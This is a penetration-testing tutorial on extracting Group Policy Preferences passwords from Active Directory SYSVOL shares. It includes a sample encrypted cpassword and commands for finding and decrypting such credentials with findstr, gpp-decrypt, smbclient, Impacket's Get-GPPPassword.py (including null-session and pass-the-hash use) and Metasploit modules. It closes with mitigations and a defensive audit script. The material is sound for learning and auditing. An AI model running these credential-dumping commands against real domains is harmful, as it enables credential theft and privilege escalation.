Attacking GPP(Group Policy Preferences) Credentials | Active Directory Pentesting

Jai Gupta, published in InfoSec Write-ups, Sep 6, 2022 (3 min read)

A very common and easy attack that recovers user credentials stored in the SYSVOL share; those credentials can then be used to get a shell or escalate privileges.

Background:

Group Policy Preferences (GPP) allowed administrators to create domain policies with embedded credentials. Wait, but what is GPP?

Group Policy Preferences is a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems.

To put it simply, GPP is a tool that gives administrators advanced capabilities for configuring and managing account policy across a Windows domain network.

These policies allowed them to create local accounts and embed credentials for tasks that would otherwise require a password hard-coded in a script. When a new Group Policy Preference (GPP) is created, an XML file (generally Groups.xml) holding the configuration data, including any password associated with the preference, is written to the SYSVOL share, a set of folders on the domain controllers that every authenticated domain user can read.

For protection, Microsoft encrypts the password with AES before storing it in the "cpassword" attribute. But the key is publicly available on MSDN!

The Domain Group Policies are stored at:

\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

The cpassword attribute in the XML file looks like this (output trimmed):

└─$ cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
...
D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1"
...

There are several scenarios in which we can read these files:

  • We already have a low-privileged shell on a domain-joined system, so we can search the SYSVOL share for the XML files.
  • We can access SMB file shares anonymously (without a password) because guest access is allowed, and the share hosts the XML files.
  • Any other vulnerability that exposes the XML files or allows access to them.

Affected Systems:

Microsoft lists the affected systems in the MS14-025 bulletin.

Exploitation:

There are many ways to find the password and decrypt it easily, for example:

  1. If we already have shell access, we can search for the keyword "cpassword"; its attribute value is the encrypted password:
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

Then decrypt it with the gpp-decrypt tool that ships with Kali to get the cleartext password, which can later be used to escalate privileges:

gpp-decrypt <hash>

2. If we are allowed to connect to a share as guest, we can pull the files from SYSVOL, take the cpassword value from them and pass it to gpp-decrypt:

$ smbclient \\\\ip_address\\share
> mget *    (download every file, policy XML files included)

3. Use the Impacket script Get-GPPPassword.py to search for and dump the password:

# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'

# with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

# pass the hash (with an NT hash; no password is given on the command line)
Get-GPPPassword.py -hashes :'NThash' 'DOMAIN'/'USER'@'DOMAIN_CONTROLLER'

# parse a local file
Get-GPPPassword.py -xmlfile '/path/to/Policy.xml' 'LOCAL'

4. Use the PowerSploit module Get-GPPPassword.ps1, or the Metasploit modules 'auxiliary/scanner/smb/smb_enum_gpp' and 'post/windows/gather/credentials/gpp', to find and decrypt the password automatically.

Mitigation:

  • Install KB2962486 (MS14-025) on every computer used to manage Group Policy; it prevents new credentials from being added to Group Policy Preferences.
  • Delete any existing GPP XML files containing passwords from SYSVOL.
  • Never store passwords in files that are readable by all authenticated users.
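The second mitigation assumes you can actually find every leftover cpassword in SYSVOL, and the findstr one-liner above only matches the string, not which policy or account it belongs to. The following audit script is an added example, not code from the original post or from any of the tools it mentions: it walks a Policies tree, parses every XML file, and reports each element that carries a cpassword attribute (whether the value is still set or has been cleared to an empty string), together with the policy GUID taken from the path, the preference area (Groups, Drives, and so on) and the account or item the entry applies to. The sample tree it builds in a temp directory is constructed for the demo: Groups.xml is the trimmed snippet from above made well-formed (the userName attribute is my addition), and Drives.xml is an invented second file with an emptied cpassword. The attribute names tried for the account (userName, accountName, runAs, username) are an assumption about how the different preference areas label it; the script never decrypts anything.

```python
"""Audit a SYSVOL Policies tree for Group Policy Preference XML files that
still carry a cpassword attribute. Added example, not from the original post.
Assumed layout: <root>/Policies/{GUID}/(MACHINE|USER)/Preferences/<Area>/<Area>.xml
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Policy GUID as it appears in the directory name, e.g. {31B2F340-...}
POLICY_GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

# Attribute names that, by assumption, identify the account a preference item
# runs as or creates; the exact name differs between preference areas.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Policy GUID copied from the post's own snippet; the XML bodies are constructed.
POLICY_GUID = "{31B2F340-016D-11D2-945F-00C04FB984F9}"

GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
"""

# Constructed second file: the password was removed, but the attribute remains.
DRIVES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:" image="2" changed="2018-07-18 20:50:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" path="\\FILESERVER\home" cpassword="" userName=""/>
  </Drive>
</Drives>
"""


def _account_for(elem):
    """Return the first non-empty account-like attribute on elem, else None."""
    for attr in ACCOUNT_ATTRS:
        if elem.get(attr):
            return elem.get(attr)
    return None


def find_cpassword_entries(policies_root):
    """Walk policies_root and return one dict per element with a cpassword
    attribute. Unparseable XML files are reported as findings with an 'error'
    key so that a broken file is not silently skipped."""
    findings = []
    for dirpath, _dirs, files in os.walk(policies_root):
        for fname in files:
            if not fname.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError as exc:
                findings.append({"file": path, "error": str(exc)})
                continue
            # ElementTree has no parent pointers, so build the map once per file.
            parent_of = {child: parent for parent in root.iter() for child in parent}
            guid = POLICY_GUID_RE.search(path)
            for elem in root.iter():
                if "cpassword" not in elem.attrib:
                    continue
                parent = parent_of.get(elem)
                findings.append({
                    "file": path,
                    "policy_guid": guid.group(0) if guid else None,
                    "area": root.tag,                      # Groups, Drives, ...
                    "item": parent.get("name") if parent is not None else None,
                    "account": _account_for(elem),
                    "has_password": bool(elem.attrib["cpassword"]),
                })
    return findings


def build_sample_tree():
    """Create the constructed sample tree in a temp dir; return its Policies path."""
    base = tempfile.mkdtemp(prefix="sysvol-audit-")
    samples = {
        os.path.join("MACHINE", "Preferences", "Groups", "Groups.xml"): GROUPS_XML,
        os.path.join("USER", "Preferences", "Drives", "Drives.xml"): DRIVES_XML,
    }
    for rel, body in samples.items():
        full = os.path.join(base, "Policies", POLICY_GUID, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return os.path.join(base, "Policies")


if __name__ == "__main__":
    # On a real domain, point this at \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies instead.
    for finding in find_cpassword_entries(build_sample_tree()):
        print(finding)
```

Entries with has_password set to False are worth keeping in the report: an emptied cpassword shows the item was once password-backed, which is a hint to check whether that account's password was ever rotated after the value was removed.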
